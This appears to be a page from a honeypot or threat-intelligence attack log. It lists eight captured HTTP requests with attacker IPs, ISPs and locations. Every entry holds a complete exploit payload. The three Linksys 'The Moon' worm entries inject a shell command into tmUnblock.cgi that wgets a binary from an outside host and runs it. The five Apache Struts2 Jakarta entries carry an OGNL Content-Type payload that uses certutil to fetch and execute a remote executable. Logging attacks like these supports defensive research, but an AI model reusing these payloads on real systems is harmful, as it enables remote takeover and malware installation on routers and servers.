1-10 of 3529 results (353 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.213.121.104
Dest. port: 8080
Time: 05/10/2019 15:51:03
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Yunnan, Kunming
POST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: */*
User-Agent: python-requests/2.20.0
Host: 192.168.0.14:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEP

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.135
Dest. port: 8080
Time: 10/08/2019 14:46:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Henan, Anyang
POST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: */*
User-Agent: python-requests/2.20.0
Host: 159.89.182.124:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.135
Dest. port: 8080
Time: 09/07/2019 07:07:16
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Henan, Anyang
rDNS: hn.kd.smx.adsl
POST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: */*
User-Agent: python-requests/2.20.0
Host: 159.89.182.124:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:27
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.do HTTP/1.1
accept-language: zh-cn
Host: 107.210.125.117:8080
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
connection: Keep-Alive
referer: http://107.210.125.117:8080/index.do
Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:26
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.action HTTP/1.1
accept-language: zh-cn
Host: 107.210.125.117:8080
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
connection: Keep-Alive
referer: http://107.210.125.117:8080/index.action
Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:25
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /struts2-rest-showcase/orders.xhtml HTTP/1.1
accept-language: zh-cn
Host: 107.210.125.117:8080
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
connection: Keep-Alive
referer: http://107.210.125.117:8080/struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 222.134.22.239
Dest. port: 8080
Time: 10/03/2019 05:22:24
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Shandong, Qingdao
GET /index.do HTTP/1.1
accept-language: zh-cn
Host: 201.6.177.246:8080
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
connection: Keep-Alive
referer: http://201.6.177.246:8080/index.do
Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/rsknrjosxcmdgwz23121.exe & cmd.exe /c C:/Windows/temp/rsknrjosxcmdgwz23121.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 222.134.22.239
Dest. port: 8080
Time: 10/03/2019 05:22:23
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Shandong, Qingdao
GET /index.action HTTP/1.1
accept-language: zh-cn
Host: 201.6.177.246:8080
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
connection: Keep-Alive
referer: http://201.6.177.246:8080/index.action
Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/rsknrjosxcmdgwz23121.exe & cmd.exe /c C:/Windows/temp/rsknrjosxcmdgwz23121.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}